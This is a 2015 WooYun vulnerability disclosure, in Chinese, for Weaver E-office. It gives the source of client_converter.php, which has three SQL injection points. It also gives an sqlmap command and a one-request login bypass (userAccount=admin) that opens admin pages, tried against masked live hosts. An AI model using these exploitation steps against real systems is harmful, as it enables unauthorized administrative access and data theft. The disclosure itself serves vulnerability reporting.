当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(13) 关注此漏洞

缺陷编号: WooYun-2015-124503

漏洞标题: 泛微Eoffice某处文件存在多处SQL注入及可绕过登录直接操作后台

相关厂商: 泛微Eoffice

漏洞作者: Bear baby

提交时间: 2015-07-06 16:59

公开时间: 2015-10-06 15:26

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-06: 细节已通知厂商并且等待厂商处理中
2015-07-08: 厂商已经确认,细节仅向厂商公开
2015-07-11: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2015-09-01: 细节向核心白帽子及相关领域专家公开
2015-09-11: 细节向普通白帽子公开
2015-09-21: 细节向实习白帽子公开
2015-10-06: 细节向公众公开

简要描述:

表示还没收到过有$的洞,来一个试试

详细说明:

漏洞文件:/client_converter.php

代码如下:

code 区域
<?php
/*********************/
/* */
/* Version : 5.1.0 */
/* Author : RM */
/* Comment : 071223 */
/* */
/*********************/

session_start( );
include_once( "inc/conn.php" );
$userAccount = $_REQUEST['userAccount'];
$langID = $_REQUEST['lang'];
$getLangFlagSQL = "SELECT * FROM language WHERE LANG_ID = ".$langID;
$getLangFlagResult = exequery( $connection, $getLangFlagSQL );
$getLangFlagRow = mysql_fetch_array( $getLangFlagResult );
$lang = $getLangFlagRow['LANG_AB'];
$query = "SELECT * from USER where USER_ACCOUNTS='".$userAccount."'";
$cursor = exequery( $connection, $query );
$ROW = mysql_fetch_array( $cursor );
$query = "SELECT * from USER_PRIV where USER_PRIV=".$ROW['USER_PRIV'];
$cursor = exequery( $connection, $query );
if ( $ROW1 = mysql_fetch_array( $cursor ) )
{
$LOGIN_FUNC_STR = $ROW1['FUNC_ID_STR'];
}
$LOGIN_THEME = $ROW['THEME'];
$template = $ROW['TEMPLATE'];
if ( !$template )
{
$template_query = "SELECT TEMPLATE_NAME FROM sys_template WHERE TEMPLATE_DEFAULT = 1 ";
$template_rs = exequery( $connection, $template_query );
if ( $row_tp = mysql_fetch_array( $template_rs ) )
{
$template = $row_tp['TEMPLATE_NAME'];
}
else
{
$template = "8series";
}
}
if ( $template == "8series" )
{
$mainUrl = "/general/index8.php";
}
else if ( $template == "7series" )
{
$mainUrl = "/general/index.php";
}
else
{
$mainUrl = "index8.php";
}
if ( $LOGIN_THEME == "" )
{
$LOGIN_THEME = "default";
}
$LOGIN_THEME = $template."/".$LOGIN_THEME;
$_SESSION['LOGIN_USER_ID'] = $ROW['USER_ID'];
$_SESSION['LOGIN_PASSWORD'] = $ROW['PASSWORD'];
$_SESSION['LOGIN_POST_PRIV'] = $ROW['POST_PRIV'];
$_SESSION['LOGIN_USER_ACCOUNTS'] = $ROW['USER_ACCOUNTS'];
$_SESSION['LOGIN_USER_NAME'] = $ROW['USER_NAME'];
$_SESSION['LOGIN_USER_PRIV'] = $ROW['USER_PRIV'];
$_SESSION['LOGIN_DEPT_ID'] = $ROW['DEPT_ID'];
$_SESSION['LOGIN_FUNC_STR'] = $LOGIN_FUNC_STR;
$_SESSION['LOGIN_THEME'] = $LOGIN_THEME;
$_SESSION['LOGIN_LANG_ID'] = $langID;
$_SESSION['LOGIN_LANG'] = $lang;
$targetType = $_REQUEST['target'];
$url = $_REQUEST['goto'];
$funcID = $_REQUEST['funcID'];
if ( $funcID != "" )
{
$query = "update user_menu set FREQUENCY =FREQUENCY+1 where user_id='".$ROW['USER_ID']."' and func_id={$funcID}; ";
exequery( $connection, $query );
}
if ( $targetType == "blank" )
{
header( "location:".$url );
}
else
{
header( "location:".$mainUrl."?goto=".urlencode( $url ) );
}
?>



注入漏洞:

注入存在以下语句

code 区域
$userAccount = $_REQUEST['userAccount'];
$langID = $_REQUEST['lang'];
$getLangFlagSQL = "SELECT * FROM language WHERE LANG_ID = ".$langID; //lang直接进入sql



查询

code 区域
$getLangFlagResult = exequery( $connection, $getLangFlagSQL );
$getLangFlagRow = mysql_fetch_array( $getLangFlagResult );
$lang = $getLangFlagRow['LANG_AB'];
$query = "SELECT * from USER where USER_ACCOUNTS='".$userAccount."'"; //userAccount直接进入sql查询
$cursor = exequery( $connection, $query );
$ROW = mysql_fetch_array( $cursor );
……..省略代码……
$funcID = $_REQUEST['funcID'];
if ( $funcID != "" )
{
$query = "update user_menu set FREQUENCY =FREQUENCY+1 where user_id='".$ROW['USER_ID']."' and func_id={$funcID}; "; //funcID直接进入sql查询
exequery( $connection, $query );
}



上面三处参数都是直接进入sql语句进行查询,导致注入

code 区域
sqlmap.py -u "http://localhost/client_converter.php?userAccount=1&lang=1" --dbms=mysql --dbs



1.png



网上案例测试如下

2.png







绕过登录直接操作后台

问题存在如下代码:

code 区域
$query = "SELECT * from USER where USER_ACCOUNTS='".$userAccount."'";
$cursor = exequery( $connection, $query );
$ROW = mysql_fetch_array( $cursor );
$query = "SELECT * from USER_PRIV where USER_PRIV=".$ROW['USER_PRIV'];
$cursor = exequery( $connection, $query );
if ( $ROW1 = mysql_fetch_array( $cursor ) )
{
$LOGIN_FUNC_STR = $ROW1['FUNC_ID_STR'];
}
……省略代码……
//userAccount参数进入SQL语句,查询UserAccount表,如记录存在 把USER_ID PASSWORD等值赋值到SESSION里面。
$LOGIN_THEME = $template."/".$LOGIN_THEME;
$_SESSION['LOGIN_USER_ID'] = $ROW['USER_ID'];
$_SESSION['LOGIN_PASSWORD'] = $ROW['PASSWORD'];
$_SESSION['LOGIN_POST_PRIV'] = $ROW['POST_PRIV'];
$_SESSION['LOGIN_USER_ACCOUNTS'] = $ROW['USER_ACCOUNTS'];
$_SESSION['LOGIN_USER_NAME'] = $ROW['USER_NAME'];
$_SESSION['LOGIN_USER_PRIV'] = $ROW['USER_PRIV'];
$_SESSION['LOGIN_DEPT_ID'] = $ROW['DEPT_ID'];
$_SESSION['LOGIN_FUNC_STR'] = $LOGIN_FUNC_STR;
$_SESSION['LOGIN_THEME'] = $LOGIN_THEME;
$_SESSION['LOGIN_LANG_ID'] = $langID;
$_SESSION['LOGIN_LANG'] = $lang;

再看后台验证功能的文件,/inc/auth.php。部分代码如下
session_start( );
include_once( "inc/utility.php" );
include_once( "inc/conn.php" );
global $_sess;
if ( !session_is_registered( "LOGIN_USER_ID" ) ) //LOGIN_USER_ID
{
$url = $_SERVER['PHP_SELF'];
echo "<script>\r\n\ttop.location.href='/login.php';\r\n\t</script>";
exit( );
}
$_sess['lang'] = $_SESSION['LOGIN_LANG'];
$_sess['lg_theme'] = $_SESSION['LOGIN_THEME'];
$lang_file = "lang/".$_sess['lang']."/common.lang.php";
include_once( $lang_file );
includelangpak( "other" );
if ( $_SESSION['LOGIN_OA_ISPIRIT'] != "ispirit" )
{
$sql = "SELECT * FROM SYS_PARA WHERE PARA_NAME = 'LIMIT_LOGIN_TIMES' ";
$re = exequery( $connection, $sql );
$row = mysql_fetch_array( $re );
$lock = $row['PARA_VALUE'];
if ( $lock == "1" )
{
$sid = session_id( );
$uid = $_SESSION['LOGIN_USER_ID'];
$sql = "SELECT SESSION_ID FROM user_online WHERE USER_ID='".$uid."'";
$re = exequery( $connection, $sql );
$row = mysql_fetch_array( $re );
$row['SESSION_ID'];



该文件通过判断session里面的值进行用户验证。

利用方法:

先构造一个用户 如admin。访问client_converter.php?userAccount=用户名&lang=cn

3.png



出现报错,没关系,接下来直接访问后台主页 general/index8.php。可以访问了。

4.png



再访问个 用户管理页面general/system/user/userlist.php。

5.png



漏洞证明:

网上测试案例:

**.**.**.**:8082/client_converter.php?userAccount=admin&lang=cn

**.**.**.**:8082/general/system/user/userlist.php

7.png



8.png



官网

http://**.**.**.**:8028/client_converter.php?userAccount=admin&lang=cn

http://**.**.**.**:8028/general/system/user/userlist.php

10.png



11.png

修复方案:

严格过滤参数,加强安全意识。

版权声明:转载请注明来源 Bear baby@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-07-08 15:24

厂商回复:

CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2015-07-04 17:12 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    你的很多都有$啊

  2. 2015-07-04 17:26 | 茜茜公主 ( 普通白帽子 | Rank:2407 漏洞数:413 | 家里二宝出生,这几个月忙着把屎把尿...忒...)
    0

    好浮夸 表示还没收到过有$的洞,来一个试试

  3. 2015-07-04 18:27 | Bear baby ( 普通白帽子 | Rank:238 漏洞数:28 | 总感觉我会在哪天突然顿悟。)
    0

    @xsser 额,是要再等等才会显示$符号是么。。

  4. 2015-07-04 18:28 | Bear baby ( 普通白帽子 | Rank:238 漏洞数:28 | 总感觉我会在哪天突然顿悟。)
    0

    @茜茜公主 我的错。。

  5. 2015-10-06 16:52 | 白无常 ( 实习白帽子 | Rank:92 漏洞数:11 )
    0

    然而并没有$

登录后才能发表评论,请先 登录